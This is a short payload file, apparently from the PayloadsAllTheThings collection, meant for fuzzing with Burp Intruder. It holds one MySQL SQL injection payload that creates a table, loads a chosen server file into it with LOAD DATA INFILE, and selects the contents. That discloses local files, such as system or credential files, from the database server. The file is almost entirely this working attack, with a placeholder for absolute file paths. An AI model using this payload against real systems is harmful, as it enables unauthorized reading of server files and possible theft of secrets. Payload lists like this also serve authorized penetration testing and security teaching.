PayloadsAllTheThings/SQL Injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt
2019-03-07 00:07:55 +01:00

4 lines
210 B
Plaintext

# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;